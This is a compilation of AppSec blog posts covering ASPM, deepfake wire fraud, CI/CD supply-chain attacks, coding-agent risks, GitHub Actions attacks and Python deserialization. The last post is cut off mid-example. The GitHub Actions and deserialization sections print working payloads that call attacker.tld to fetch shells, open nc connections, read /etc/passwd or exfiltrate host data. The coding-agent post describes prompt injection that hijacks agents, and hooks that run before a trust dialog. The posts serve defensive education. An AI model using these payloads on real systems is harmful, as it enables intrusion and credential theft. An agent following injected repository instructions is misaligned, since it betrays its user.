03/05/2026

ASPM Is Not Magic. It Is a Bandage. A Useful One

// ELUSIVE THOUGHTS — APPSEC / TOOLING

ASPM Is Not Magic. It Is a Bandage. A Useful One.

Posted by Jerry — May 2026

Every AppSec vendor pitch deck in 2026 contains the acronym ASPM. Application Security Posture Management. The category is real. The marketing is louder than the substance.

This post is the practitioner's view of what ASPM actually does, what it does not do, and how to evaluate whether your organization is ready to spend on it. Written from the perspective of someone who runs assessments for clients and has watched several ASPM rollouts succeed and several fail.

// what aspm is, mechanically

An ASPM platform sits on top of your existing security scanners and aggregates their findings. SAST results, DAST results, SCA dependencies, secrets scanners, container image scanners, IaC scanners. The platform deduplicates, correlates, prioritizes, and routes findings to owners.

The market is crowded. Apiiro, Cycode, Backslash, OX Security, Snyk AppRisk, Endor Labs, Aikido, Dazz, Legit Security, ArmorCode, Phoenix Security. The differentiation between vendors is meaningful but smaller than the marketing suggests. The core capability — aggregation, correlation, prioritization — is shared across the category.

// what aspm actually does well

CAPABILITY 1 — DEDUPLICATION

Four scanners reporting the same SQL injection in the same line of code as four findings is a real problem in mature security programs. ASPM platforms collapse this to a single finding with multiple sources. The reduction in alert fatigue is significant and measurable. If your team is drowning in duplicate findings, this alone justifies ASPM.

CAPABILITY 2 — REACHABILITY ANALYSIS

A vulnerable function in an imported library is only exploitable if your code actually calls it. ASPM platforms with reachability analysis can downgrade findings in unreachable code paths, frequently reducing the open finding count by 60-80 percent. This is the most concrete value-add of the category. The reachability analysis quality varies meaningfully between vendors.

CAPABILITY 3 — OWNERSHIP MAPPING

Findings get routed to the team that owns the code, via Git blame, CODEOWNERS, and integration with the engineering org chart. The "who fixes this?" question is answered automatically. This is more valuable than it sounds in any organization with more than three engineering teams.

CAPABILITY 4 — RISK SCORING THAT INCLUDES BUSINESS CONTEXT

Generic CVSS scores treat every vulnerability the same regardless of where it lives. ASPM platforms can incorporate context: is this service internet-facing, does it handle PII, is it in production, is the vulnerable code path actually invoked? The result is a risk score that reflects the organization's actual exposure, not just the theoretical severity.

CAPABILITY 5 — TREND REPORTING TO LEADERSHIP

If you have ever tried to produce a quarterly board report on AppSec posture by manually pulling from five scanners and reconciling the numbers, you understand why this matters. ASPM platforms produce reports that can be defended in a board meeting. The strategic value of having a single number to talk about — even an imperfect one — is real.

// what aspm does not do

The honest list, which vendors will not put on their slides:

  1. It does not find vulnerabilities your existing scanners did not already find. Aggregation is not detection. The underlying scanner quality is what determines what gets identified. ASPM organizes the output, it does not produce new output.
  2. It does not replace threat modeling. Threat modeling is a forward-looking design exercise. ASPM is a backward-looking finding aggregator. Different work, different time, different output.
  3. It does not fix anything automatically. Auto-remediation features exist but are limited to specific cases — package upgrades, simple config changes. The hard fixes still require engineers writing code.
  4. It does not solve organizational dysfunction. If your AppSec team and your engineering teams have a poor working relationship, an ASPM platform makes the problems more visible without resolving them.
  5. It does not eliminate the need for security expertise on the team. Someone has to interpret the findings, calibrate the prioritization, configure the integrations, and respond to the alerts.

// the readiness test

Before signing a six-figure ASPM contract, run this test on your existing security program:

Pull a week of findings from every scanner you currently run. Put them in a spreadsheet. Manually deduplicate them. Manually assign owners. Manually prioritize.

If the result is unmanageable chaos, ASPM will help significantly. The platform will do this work continuously and at scale.

If the result is tractable — annoying but doable in a day — your problem is not tooling. Your problem is more likely to be one of the following: scanner configuration that is producing too many false positives, lack of clear ownership, lack of remediation SLA enforcement, or a backlog that has not been triaged in months. ASPM will not solve these. They are organizational problems disguised as tooling problems.

// the implementation pattern that works

Successful ASPM rollouts share a few characteristics from the engagements I have seen:

The implementation is owned by a senior AppSec engineer with explicit allocation, not a side project. The engineer becomes the operator of the platform — tuning the rules, calibrating the scoring, training the engineering teams on how to interpret the output.

The rollout is phased. Start with one set of scanners and one engineering team. Demonstrate value. Expand. Trying to integrate every scanner and every team in a quarter is how ASPM rollouts become shelfware.

The integration with engineering workflow is taken seriously. The findings need to land in the engineer's existing tools — Jira, Linear, GitHub Issues — with clear context, clear severity, and clear remediation guidance. Findings that require engineers to log into yet another portal are findings that do not get fixed.

The metrics are tracked from baseline. Mean time to remediation. Open finding count by severity. Trend over time. These metrics are what justifies the platform spend at renewal time.

// the bottom line

ASPM is a real category that solves a real problem. It is also being marketed as a transformative platform, which it is not. It is a useful aggregation and prioritization layer that reduces operational toil and produces better metrics.

If your AppSec program is mature enough that the volume of findings is the bottleneck, ASPM helps. If your AppSec program is still building scanner coverage, building threat modeling practice, or building remediation discipline, ASPM is premature optimization. Spend the budget on the underlying work first.

Tools do not fix process gaps. They expose them faster. Whether that exposure becomes useful depends on whether the organization is ready to act on it.

$ end_of_post.sh — running ASPM at your shop? what's working, what isn't?

The CFO Was Never On the Call: Deepfake-Driven BEC in 2026

// ELUSIVE THOUGHTS — APPSEC / SOCIAL ENGINEERING

The CFO Was Never On the Call: Deepfake-Driven BEC in 2026

Posted by Jerry — May 2026

A finance director joins a Zoom call. The CFO is on the screen, voice and face perfectly familiar, requesting an urgent wire transfer. The transfer goes through. The CFO never logged in.

In 2024, this exact playbook cost engineering firm Arup roughly twenty-five million dollars in Hong Kong. In 2026, the cost of running this attack has fallen below five US dollars and requires under thirty seconds of public training audio. The infrastructure to do this at industrial scale is now sitting in consumer SaaS products.

// the threat model has shifted

Traditional BEC playbooks assume a text-based attack: spoofed email, lookalike domain, social-engineered urgency. Defensive guidance was built around DMARC, DKIM, SPF, and "verify the sender's email domain." All of that still matters. None of it covers the current attack vector.

The current attack vector is real-time voice and video synthesis, deployed on live conferencing platforms. Open-source models like FaceFusion and commercial offerings like ElevenLabs Pro have collapsed the technical barrier. The latency required for a convincing real-time conversation has dropped below two hundred milliseconds. The training audio requirement has dropped to under a minute.

Sora 2 and Veo 3 enable pre-recorded video that survives casual scrutiny. The combination — pre-recorded video for the appearance plus real-time voice cloning for the dialogue — is what attackers are using now.

// what mfa cannot save you from

The first thing to understand: this attack does not bypass authentication. It bypasses the human in the loop. Your finance director has authenticated correctly. They are on the right Zoom call. They are talking to what looks like the right person. The compromise is not at the auth layer — it is at the trust-the-call layer.

Identity verification at the start of the call does not help, because the attacker is on the same call as a legitimate participant. Speaker verification on the conferencing platform does not help — the platform sees a verified meeting host inviting a guest. The guest just happens to look and sound like the CEO.

// what actually works

The defensive controls below are not novel. They are operational discipline that most organizations have not implemented because, until recently, they felt like overkill. They no longer do.

CONTROL 1 — OUT-OF-BAND CALLBACK VERIFICATION

Any wire transfer above an organizationally defined threshold requires verification via a callback to a pre-shared phone number. Not the number on the email. Not the number from the call. The number stored in the procurement system from when the relationship was established. The number that was set up before any social engineering took place.

CONTROL 2 — CHALLENGE PHRASES FOR HIGH-VALUE APPROVALS

Yes, like spy films. Pre-agreed code phrases between executives and finance teams, rotated quarterly, used as a final challenge for any approval over a defined value. The reason this technique appears in fiction is that it works in reality. A deepfake of someone's voice cannot reproduce a code phrase the original person never spoke.

CONTROL 3 — LIVENESS CHALLENGES

Real-time deepfake models still degrade noticeably under unscripted physical motion. Ask the person to turn their head sharply, hold up a specific number of fingers, or move the camera. Pre-recorded video fails immediately. Real-time synthesis fails on novel gestures. This is a stopgap — the technology will improve — but in the current threat landscape it is effective.

CONTROL 4 — APPROVAL THRESHOLDS AND DUAL CONTROL

No single human should be able to approve a transfer above a meaningful threshold based on a video call alone. Dual control — two distinct authenticated approvals through the financial system, not through the conferencing platform — moves the trust boundary back to systems with stronger guarantees than the human eye and ear.

CONTROL 5 — TRAIN THE SPECIFIC FAILURE MODE

Generic phishing training does not cover this. Finance staff, executive assistants, and treasury operators need specific tabletop exercises against deepfake scenarios. They need to feel the social pressure of being asked by a "C-level" to bypass procedure, and they need explicit organizational backing to refuse. "Trust your instincts" is not a control — clear procedural authority is.

// detection technology

Several vendors are building real-time deepfake detection for conferencing platforms — Reality Defender, Pindrop, Sensity AI. The technology exists. It is not yet good enough to be the only line of defense. Detection accuracy degrades against the latest generation of synthesis models, and the false positive rate creates real friction for legitimate calls.

The honest assessment in 2026: deploy the detection technology where you can, but do not depend on it. The procedural controls above carry the load.

// the larger pattern

This category of attack is the leading edge of a broader shift. The attack surface is no longer the email, the network, or the application. It is the trusted communication channel that humans use to coordinate work. The voice you recognize. The face on the screen. The conversational dynamics that signal legitimacy.

Application security as a discipline has historically been about code, infrastructure, and data flows. The discipline now extends to the human protocols that surround those systems. The threat model that does not include synthetic media is incomplete.

If your incident response runbook does not include "what we do when an employee reports an executive impersonation," it is missing a chapter that 2026 has made mandatory.

$ end_of_post.sh — comments open. Tell me what your org is doing about this.

The CI/CD Pipeline Is the Crown Jewel: Why Every 2026 Supply Chain Attack Targets the Same Thing

// ELUSIVE THOUGHTS — APPSEC / SUPPLY CHAIN

The CI/CD Pipeline Is the Crown Jewel: Why Every 2026 Supply Chain Attack Targets the Same Thing

Posted by Jerry — May 2026

If you list the named supply chain attacks of the last twelve months and look at what each one was trying to steal, the answer is identical across the list.

Trivy. KICS. LiteLLM. Telnyx. Axios. Bitwarden CLI. SAP CAP. PyTorch Lightning. Intercom Client. PGServe. Different ecosystems, different threat actor groups in some cases, identical objective in every case: extract the secrets and tokens that live inside CI/CD pipelines and developer environments.

GitHub Actions secrets. AWS access keys. GCP service account JSON. Azure managed identity tokens. npm publish tokens. PyPI API tokens. Docker Hub credentials. SSH keys for deploy targets. Kubernetes service account tokens. Cloud database credentials. The same shopping list, every time.

// the math the attackers worked out first

Phishing one developer to compromise their personal machine yields one set of credentials. Phishing a hundred developers yields a hundred sets, with proportional cost and detection risk.

Compromising one widely-used build tool, GitHub Action, or npm package yields the credentials of every CI/CD pipeline that uses it. The blast radius scales with the popularity of the package, not the effort of the attack.

TeamPCP, the threat actor group behind the Trivy, KICS, LiteLLM, and Telnyx campaigns, internalized this math. So did the Shai-Hulud worm operators behind the Bitwarden CLI compromise. The attacks of 2026 are not opportunistic. They are systematic, with each compromise feeding the next via stolen npm publish tokens that allow lateral movement across packages.

The PyTorch Lightning compromise of late April 2026 demonstrated the secondary effect: the malicious version was live for forty-two minutes before quarantine. The infection vector was not even direct download — it spread through a transitive dependency in pyannote-audio, infecting downstream consumers who never directly installed Lightning.

// the structural weakness

CI/CD pipelines were designed for trust. Build them, watch them work, deploy what they output. The historical threat model assumed the build environment was clean and the inputs were trusted. That assumption no longer holds.

The specific structural failures that supply chain attacks exploit, in approximate order of impact:

FAILURE 1 — TAG MUTATION

GitHub Actions and npm both allow tags to be reassigned to different commits or versions. uses: aquasecurity/trivy-action@master and uses: aquasecurity/trivy-action@v1 both resolve dynamically. When TeamPCP compromised the Trivy action repository, they force-pushed tags to point at malicious code. Every workflow that referenced the action by tag silently received the malicious version on the next run. The fix is to pin to commit SHA. Adoption remains low.

FAILURE 2 — STATIC LONG-LIVED CREDENTIALS

A static AWS access key with broad permissions stored in GitHub Actions secrets is the most common pattern in 2026. It is also the most exploitable. AWS, GCP, and Azure all support OIDC federation that issues short-lived tokens scoped to specific workflows. Adoption requires changing the IAM model, which is real work, which is why most organizations have not done it.

FAILURE 3 — UNCONSTRAINED EGRESS FROM BUILD RUNNERS

Build runners typically have unrestricted internet access during dependency installation. The malicious postinstall script can exfiltrate to any HTTPS endpoint. The CanisterSprawl campaign used Internet Computer Protocol canister endpoints specifically because they look like generic HTTPS traffic and survive most network filtering. Egress allow-listing on build runners is operationally hard but eliminates an entire category of exfiltration.

FAILURE 4 — INSTALL-TIME CODE EXECUTION

npm postinstall scripts and Python setup.py scripts execute arbitrary code as part of dependency resolution. The original ecosystem decision to allow this was a developer convenience that became a permanent attack surface. npm install --ignore-scripts and pip's PEP 517 build isolation reduce this surface but break enough legitimate workflows that they are not universally adopted.

FAILURE 5 — SCANNER AS ATTACK VECTOR

Security scanners like Trivy and Checkmarx KICS are run early in the pipeline with broad access to source code and credentials. When the scanner itself is compromised, it has access to everything the pipeline has access to. The Trivy compromise specifically exploited this: a tool intended to find vulnerabilities was used to deliver malware. Treat scanners as untrusted dependencies. Pin them. Sandbox them. Audit their network access.

// hardening checklist for this week

The full hardening of a CI/CD environment is a multi-quarter project. The list below is what is achievable in a focused week of work and produces the largest reduction in attack surface per hour invested.

  1. Audit every uses: reference in every workflow. Replace tag references with commit SHAs. Tools like StepSecurity and Renovate can automate the SHA-pinning and the subsequent maintenance.
  2. Enable npm audit signatures and PyPI attestations on every install command in CI. Sigstore-backed verification is no longer optional.
  3. Replace one long-lived cloud credential with OIDC federation as a proof of concept. The first one is the hardest. The rest follow the pattern. Start with the deployment role for the highest-traffic service.
  4. Add npm publish --provenance to publishing workflows. Free signal that downstream consumers can verify.
  5. Implement an egress allow-list on the build runner network for production-deployment workflows at minimum. Define the legitimate egress destinations. Block everything else. Audit the alerts. Adjust.
  6. Document the rotation procedure for every secret in your CI environment. Practice it. Test the runbook. The first time you rotate a deeply-embedded production credential under incident pressure should not be the actual incident.
  7. Inventory the security scanners running in your pipelines. Pin their versions. Read the security advisories of the scanner vendors. Subscribe to their disclosure feeds.
  8. Add a workflow that scans for unintended secret usage — accidental references to secrets in unprotected branches, secrets in PR builds, secrets in fork builds. The default GitHub configuration leaks secrets to fork builds in some scenarios.

// the principle

The CI/CD pipeline now contains more privilege than the people who use it. Production deployment credentials. Cloud admin tokens. Package publish authority. Database access. The pipeline is a service identity with broader access than most service accounts in your organization.

The defensive posture must match the privilege level. Most organizations are running their CI/CD environment with the security maturity of a printer. The supply chain attacks of 2025 and 2026 have made the cost of that mismatch concrete.

The good news: the controls that close this gap are well-documented and ecosystem-supported. SHA pinning, OIDC federation, Sigstore verification, egress control, and scanner sandboxing are not exotic. They are operational discipline. The work is the work.

$ end_of_post.sh — what's the worst credential you found in your CI? no judgment, just curiosity.

Your IDE Is the Endpoint Now: Coding Agents as the New Privileged Surface

// ELUSIVE THOUGHTS — APPSEC / DEVELOPER TOOLING

Your IDE Is the Endpoint Now: Coding Agents as the New Privileged Surface

Posted by Jerry — May 2026

Your security program probably has a category for endpoints. Workstations. Servers. Mobile devices. EDR coverage, MDM enrollment, baseline hardening, the usual.

There is a category that is missing from most programs in 2026, and it is the most privileged category in the modern engineering organization: the AI coding agent running inside the developer's IDE. Cursor. GitHub Copilot. Claude Code. Windsurf. Aider. Cline. Continue. The list keeps growing and the threat model is consistent across all of them.

// what is actually running on the developer's machine

A coding agent in 2026 is not an autocomplete extension. It is a process with the following capabilities:

  • Full read access to the developer's filesystem within the project directory, frequently extending beyond it
  • Write access to project files, often with auto-save enabled
  • Shell command execution, frequently with the developer's shell environment, meaning their AWS profile, GCP credentials, kubectl context, GitHub tokens, and SSH keys
  • Network access to LLM providers and arbitrary URLs encountered in tool use
  • MCP server connections that grant additional capabilities, including database access, browser automation, and external API integration
  • Configuration files that may execute on project open

From a permission standpoint, this is more privileged than most production service accounts.

// the trust boundary moved

The traditional trust model for a developer machine assumes that the developer is the agent of action. Code is reviewed before execution. Configurations are inspected before applied. Repositories are explored before built.

Coding agents invert this. The agent reads the repository's instructions, configurations, and prompt files. It executes based on what it reads. The developer is the approver, but only if the tool surfaces the approval. Every coding agent that exists has some path that bypasses or pre-emptively answers the approval prompt.

CVE-2025-59536, disclosed by Check Point Research in February 2026, demonstrated this against Claude Code. Two vulnerabilities, both in the configuration layer:

VULN 1 — HOOKS INJECTION VIA .claude/settings.json

A repository could contain a settings file that registered shell commands as Hooks for lifecycle events. Opening the repository in Claude Code triggered execution before the trust dialog rendered. No user click required. Effectively, repository-controlled remote code execution on every developer who opened the project.

VULN 2 — MCP CONSENT BYPASS VIA .mcp.json

Repository-controlled settings could auto-approve all MCP servers on launch, bypassing user confirmation. Combined with a malicious MCP server in the repository, this gave the attacker a tool execution channel with full developer credentials.

The structural lesson is more important than the specific CVE. Any coding agent that respects in-repository configuration files has this attack surface. Cursor's .cursor/. Aider's project config. Continue's .continue/. The patterns are similar. The vulnerabilities are not all disclosed yet.

// the prompt injection vector

Configuration injection is the obvious attack. Prompt injection is the subtler one and arguably the larger problem.

When a coding agent processes a repository, it reads the README. It reads source files. It reads issue descriptions, commit messages, dependency manifests, and documentation. Every text input is potentially adversarial. The "Agent Commander" research published in March 2026 demonstrated that markdown files committed to GitHub repositories can contain prompt injection payloads that hijack coding agent behavior — specifically, instructing the agent to make outbound network requests, modify unrelated files, or execute commands while appearing to perform the user's original task.

This is not theoretical. It has been observed in production environments. The Cloud Security Alliance documented multiple incidents in their April 2026 daily briefings.

// what the security program needs to add

The corrective controls below are organized by maturity level. Most organizations are at level zero on this category. Moving up two levels is a significant lift but produces meaningful risk reduction.

LEVEL 1 — INVENTORY

Know what coding agents are installed across your developer fleet. Browser extension audit on managed Chrome and Edge. IDE plugin audit via VS Code, JetBrains, and editor-specific management consoles. Survey developers directly. Most organizations are surprised at how many distinct coding agents are in active use.

LEVEL 2 — APPROVAL AND VERSION CONTROL

Establish an approved-tools list. Pin versions. Auto-update is now part of your supply chain — when Claude Code, Cursor, or Copilot pushes an update, that update has access to your developer machines. The compromise of any single coding agent vendor is a fleet-wide developer machine compromise. Treat the version pinning seriously.

LEVEL 3 — REPOSITORY HYGIENE

When opening unfamiliar repositories, use a sandboxed profile or a clean container. The Hooks-injection attack only works if the developer opens the repo in their privileged primary environment. A scratch container with no real credentials makes the attack much less effective. Several teams I work with have adopted devcontainer-based defaults specifically for this reason.

LEVEL 4 — CREDENTIAL HYGIENE FOR CODING AGENTS

Coding agents should not have access to long-lived production credentials. Period. Developer machines should authenticate to cloud providers via short-lived tokens issued through SSO, with explicit time-bounded sessions for production access. The standard developer setup of a static AWS key in ~/.aws/credentials with admin policies is incompatible with running a coding agent in 2026.

LEVEL 5 — MCP SERVER GOVERNANCE

Maintain an approved-MCP-server list. Treat MCP server URLs the same way you treat API integrations: registered, audited, time-bounded. The April 2026 research showing 36.7 percent of MCP servers vulnerable to SSRF means that even legitimate MCP integrations are potential attack vectors.

// the cultural change

The harder part of this work is convincing engineering leadership that developer machines are now in scope for the security program in a way they previously were not. The traditional argument — developers are trusted, their machines are behind VPN, EDR is sufficient — is structurally inadequate when the developer's IDE is reading and acting on instructions from external sources.

The framing that lands with engineering leaders: the coding agent is a junior contractor with administrative access to production. You would not give that role to an unvetted human. The agent has the same effective access. Treat it accordingly.

The endpoint that ships your code is the endpoint attackers want. They have already figured this out. The defensive side of the industry is roughly twelve months behind, which is enough time to close the gap if the work starts now.

$ end_of_post.sh — what does your dev fleet inventory look like? hit reply.

24/04/2026

GitHub Actions as an Attacker's Playground

GitHub Actions as an Attacker's Playground — 2026 Edition

CI/CD security • Supply chain • April 2026

ci-cdgithub-actionssupply-chainpwn-requestred-team

If your threat model still has "the dev laptop" as the most privileged workstation in the company, you have not been paying attention. The GitHub Actions runner is. It has production cloud credentials, registry push tokens, signing keys, and the authority to merge its own code. It is the new privileged perimeter, and by every measure we have, it is softer than the one it replaced.

This is the 2026 version of the GitHub Actions attack surface. What changed, what did not, and what you should be looking for in any code review that touches .github/workflows/.

The Classic: Pwn Request

The pattern has not changed in five years. pull_request_target runs with the target repo's secrets and write permissions. If the workflow explicitly checks out the PR head and executes anything from it, the PR author gets code execution in a context with those secrets and that write access.

name: Dangerous PR runner
on: pull_request_target:
jobs:
  run-pr-code:
    runs-on: ubuntu-latest
    permissions:
      contents: write
      pull-requests: write
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # the footgun
      - name: Run script
        run: scripts/run.sh  # attacker controls this file

The attacker PR modifies scripts/run.sh, the workflow checks out the PR head, runs the attacker's script, and the script exfiltrates $GITHUB_TOKEN. Every flavour of this bug is the same. The script can be an npm preinstall hook, a modified package.json, a new test file, a conftest.py Python side-effect. "Don't build untrusted PRs" has been the guidance since 2020 and we still find it everywhere.

Microsoft/symphony (CVE-2025-61671, CVSS 9.3) was this exact pattern. A reusable Terraform validation workflow checked out the PR merge ref with contents: write. Researchers pushed a new branch to Microsoft's origin and compromised an Azure service principal in Microsoft's tenant. Microsoft's security team initially classified it as working-as-intended.

Script Injection in run: Steps

Every ${{ github.event.* }} interpolation that ends up in a shell run: block is a potential injection. The classic:

- name: Greet PR
  run: echo "Thanks for the PR: ${{ github.event.pull_request.title }}"

PR title: "; curl attacker.tld/s.sh | sh; echo ". The runner executes the shell, substitutes the title verbatim, and the command runs. Issue titles, PR bodies, commit messages, branch names, review comments, labels — all attacker-controlled, all reachable via github.event.

The fix is always the same: pass through env:, never inline:

- name: Greet PR
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "Thanks for the PR: $PR_TITLE"

And yet the original pattern is the second most common bug class that Sysdig, Wiz, Orca, and GitHub Security Lab have been publishing on for the last two years.

Self-Hosted Runners

A self-hosted runner attached to a public repo is free compute for whoever submits the right PR. Unless the runner is configured to require approval for external contributors, an attacker PR runs on infrastructure inside your network.

The Nvidia case from 2025 is the template. Researchers dropped a systemd service that polled git config --list every half second and logged the output. On the second workflow run, the service exposed the GITHUB_TOKEN. Even though the token lacked packages: write, the runner itself was an EC2 instance with IAM permissions and network access to internal services.

Self-hosted runner hardening checklist, paraphrased from five different incident reports:

  • Ephemeral runners only. One job, one runner, destroyed after. Docker or actions-runner-controller on Kubernetes.
  • Never attach self-hosted runners to public repos. Ever.
  • Runner service account has no cloud IAM roles beyond what the job needs.
  • Network egress allow-list. No arbitrary outbound to the internet.
  • Runner host is not in the same VPC as production. Treat it like DMZ.

Supply Chain: Mutable Tags and Force-Pushed Actions

Actions are resolved at runtime. uses: org/action@v3 resolves to whatever commit v3 currently points at. When that tag gets force-pushed to a malicious commit, every workflow that uses the action runs the attacker's code on the next invocation.

tj-actions/changed-files (March 2025). A single compromised PAT led to poisoned actions that leaked secrets from over 23,000 workflows via workflow logs.

TeamPCP / trivy-action (March 2026). Attackers compromised 75 of 76 trivy-action version tags via force-push, exfiltrating secrets from every pipeline running a Trivy scan. The stolen credentials cascaded into PyPI compromises including LiteLLM.

The only defense is SHA pinning:

# Don't:
uses: aquasecurity/trivy-action@master
uses: aquasecurity/trivy-action@v0.24.0

# Do:
uses: aquasecurity/trivy-action@18f2510ee396bbf400402947b394f2dd8c87dbb0  # v0.24.0

Dependabot can update pinned SHAs. Since August 2025 GitHub's "Allowed actions" policy supports SHA pinning enforcement that fails unpinned workflows, not just warns. Turn it on.

The December 2025 Changes — What Actually Got Fixed

GitHub shipped protections on 8 December 2025. The short version:

  • pull_request_target workflow definitions are now always sourced from the default branch. You can no longer exploit an outdated vulnerable workflow that still lives on a non-default branch.
  • Environment policy evaluation now aligns with the workflow code actually executing.
  • Centralized ruleset framework for workflow execution protections — event rules, SHA pinning, action allow/block lists by ! prefix, workflow_dispatch trigger restrictions.

What did not get fixed: the base pwn request pattern. If your workflow uses pull_request_target and checks out PR code to run it, the attacker still gets code execution with your secrets. As Astral noted, these triggers are almost impossible to use securely. GitHub is adding guardrails, not removing the footgun.

The 2026 Threat Landscape

Orca's HackerBot-Claw campaign (Sep 2025) was the first major automated scanning campaign that I remember seeing at scale. It systematically triggered PR workflows against public repos, looking for exploitable CI configurations. Named targets included Microsoft, DataDog, CNCF Akri, Trivy itself, and RustPython. The campaign's impact was not that it found new bug classes — it exploited the same pwn-request and script-injection patterns from five years ago. The impact was that automated scanning of CI configurations is now a thing, and the economics favour the attacker: one vulnerable repo of the Fortune 500 is worth a lot of compute time.

If you maintain a public repo with a CI pipeline, assume you are being scanned continuously by at least one such campaign right now.

What a Review Actually Looks Like

The toolchain has matured. These are the ones I reach for on engagements:

  • zizmor. Static analysis for GitHub Actions. Catches most of the common misconfigurations (pull_request_target with checkout, script injection, excessive permissions, unpinned actions). Run this first.
  • Gato-X. Enumeration and attack tooling. If you are testing your own org's exposure, this is the red-team side.
  • CodeQL for GitHub Actions. The first-party analysis, free for public repos. Good coverage for the GitHub-specific query pack.
  • Octoscan. Another static scanner; different ruleset than zizmor, catches things zizmor misses and vice versa.

The workflow-level hardening that moves the needle:

# At the top of every workflow
permissions: {}  # start from zero, grant per-job

# Per job
jobs:
  build:
    permissions:
      contents: read
    # never use pull_request_target unless you truly need secrets
    # and you do NOT check out PR code

Organization-wide: require SHA-pinned actions, restrict workflow_dispatch to maintainers, disable pull_request_target on repos that do not need it, enable CodeQL for Actions, rotate repo-scoped PATs on a schedule. These are dashboard toggles. They cost you nothing and they kill 80% of what the automated scanners exploit.

Repos created before February 2023 still default to read/write GITHUB_TOKEN. If you inherited an older org, this is your first audit. One toggle, huge blast-radius reduction.

Closing

The suits keep asking why an industry that has been publishing on GitHub Actions security for five years still ships this stuff. The honest answer is that CI/CD is owned by the engineers who are also shipping the product, and "security hardening of the pipeline" sits below every feature deadline on the priority stack. GitHub is now forcing some of the hardening through platform defaults because the community never did it voluntarily.

If you are on the offensive side, CI is still the cheapest path to production secrets in most engagements. If you are on the defensive side, your CI pipeline needs the same threat model you give your production service. Same allow-lists, same least privilege, same rotation, same monitoring. It already has the same blast radius.


elusive thoughts • securityhorror.blogspot.com

Deserialization in Modern Python

Deserialization in Modern Python: pickle, PyYAML, dill, and Why 2026 Is Still the Year of the Footgun

AppSec • Python internals • ML supply chain • April 2026

pythondeserializationpicklepyyamlml-securityrce

Every year someone at a conference stands up and announces that Python deserialization RCE is a solved problem. Every year I find it in production. 2026 is no different. The ML boom has made it worse, not better: every HuggingFace Hub download is a pickle file someone decided to trust.

This is a field guide to what still works, what the modern scanners miss, and where to actually look when you are hunting for deserialization bugs in a Python codebase.

The Fundamental Problem

Python's pickle module does not deserialize data. It deserializes a program. The pickle format is a small stack-based virtual machine with opcodes like GLOBAL (import a name), REDUCE (call it), and BUILD (hydrate state). The VM is Turing-complete. Any object can implement __reduce__ to return a callable plus arguments that the VM will execute on load. That is not a bug. It is the feature.

import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.tld/s.sh | sh",))

payload = pickle.dumps(Exploit())
# Anyone calling pickle.loads(payload) executes the command.

Every library in the pickle family inherits this behaviour. cPickle, _pickle, dill, jsonpickle, shelve, joblib — they all execute arbitrary code during load. dill is worse because it can serialize more object types, so a dill payload can reach execution paths pickle cannot. jsonpickle is the one that catches people: the transport is JSON, which looks safe, but it reconstructs arbitrary Python objects by class path.

Where It Still Shows Up in 2026

The naive pickle.loads(request.data) pattern is rare now. The bugs that are still live are structural:

  • Session storage and cache. Django's PickleSerializer is deprecated but people still enable it for "compatibility." Redis caches storing pickled objects across service boundaries. Memcache with cPickle. Every time the cache is trust-boundary-crossing, you have a bug.
  • Celery / RQ task queues. Celery's default serializer has been JSON since 4.0 but the pickle mode is still there and still in use. Any broker that multiple services with different trust levels write to is a path to RCE.
  • Inter-service RPC with pickle over the wire. Internal tooling. "It's on the internal network." Right up until an SSRF in the front-end reaches it.
  • ML model loading. This is the big one. Every torch.load(), every joblib.load(), every pickle.load() against a downloaded model is a code execution primitive for whoever controls the weights. CVE-2025-32444 in vLLM was a CVSS 10.0 from pickle deserialization over unsecured ZeroMQ sockets. The same class hit LightLLM and manga-image-translator in February 2026.
  • NumPy .npy with allow_pickle=True. Still a default in old code. Still RCE.
  • PyYAML yaml.load(). Without an explicit Loader it used to default to unsafe. Current PyYAML warns loudly but the old patterns are still in codebases older than that warning.

PyYAML: The Underestimated Sibling

PyYAML gets less attention because people remember to use safe_load. The problem is every time someone needs a custom constructor and reaches for yaml.load(data, Loader=yaml.Loader) or yaml.unsafe_load. YAML's Python tag syntax is a gift to attackers:

# All of the following execute on yaml.load() with an unsafe Loader.
!!python/object/apply:os.system ["id"]
!!python/object/apply:subprocess.check_output [["nc", "attacker.tld", "4242"]]
!!python/object/new:subprocess.Popen [["/bin/sh", "-c", "curl .../s.sh | sh"]]

# Error-based exfil when the response contains exceptions:
!!python/object/new:str
  state: !!python/tuple
    - 'print(open("/etc/passwd").read())'
    - !!python/object/new:Warning
      state:
        update: !!python/name:exec

CVE-2019-20477 demonstrated PyYAML ≤ 5.1.2 was exploitable even under yaml.load() without specifying a Loader. The fix was making the default Loader safe. Any codebase pinned below that version is still vulnerable by default.

The ML Supply Chain Angle

This is the part that should keep AppSec teams awake. The 2025 longitudinal study from Brown University found that roughly half of popular HuggingFace repositories still contain pickle models, including models from Meta, Google, Microsoft, NVIDIA, and Intel. A significant chunk have no safetensors alternative at all. Every one of those is a binary that executes arbitrary code on torch.load().

Scanners exist. picklescan, modelscan, fickling. They are not enough:

  • Sonatype (2025): ZIP flag bit manipulation caused picklescan to skip archive contents while PyTorch loaded them fine. Four CVEs landed against picklescan.
  • JFrog (2025): Subclass imports (use a subclass of a blacklisted module instead of the module itself) downgraded findings from "Dangerous" to "Suspicious."
  • Academic research (mid-2025): 133 exploitable function gadgets identified across Python stdlib and common ML dependencies. The best-performing scanner still missed 89%. 22 distinct pickle-based model loading paths across five major ML frameworks, 19 of which existing scanners did not cover.
  • PyTorch tar-based loading. Even after PyTorch removed its tar export, it still loads tar archives containing storages, tensors, and pickle files. Craft those manually and torch.load() runs the pickle without any of the newer safeguards.

The architectural problem is that the pickle VM is Turing-complete. Pattern-matching scanners are playing catch-up forever.

A Realistic Payload Walkthrough

Say you have found a Flask endpoint that unpickles a session cookie. Here is the minimal end-to-end:

import pickle, base64

class RCE:
    def __reduce__(self):
        # os.popen returns a file; .read() makes it blocking,
        # which helps with output exfil via error channels.
        import os
        return (os.popen, ('curl -sX POST attacker.tld/x -d "$(id;hostname;uname -a)"',))

token = base64.urlsafe_b64encode(pickle.dumps(RCE())).decode()
# Set cookie: session=<token>
# The app's pickle.loads() runs it.

Add the .read() call if the app expects a specific object type and you need to avoid a deserialization error that would short-circuit the response:

class RCEQuiet:
    def __reduce__(self):
        import subprocess
        return (subprocess.check_output,
                (['/bin/sh', '-c', 'curl attacker.tld/s.sh | sh'],))

For jsonpickle where you can only inject JSON, the py/object and py/reduce keys do the same work:

{
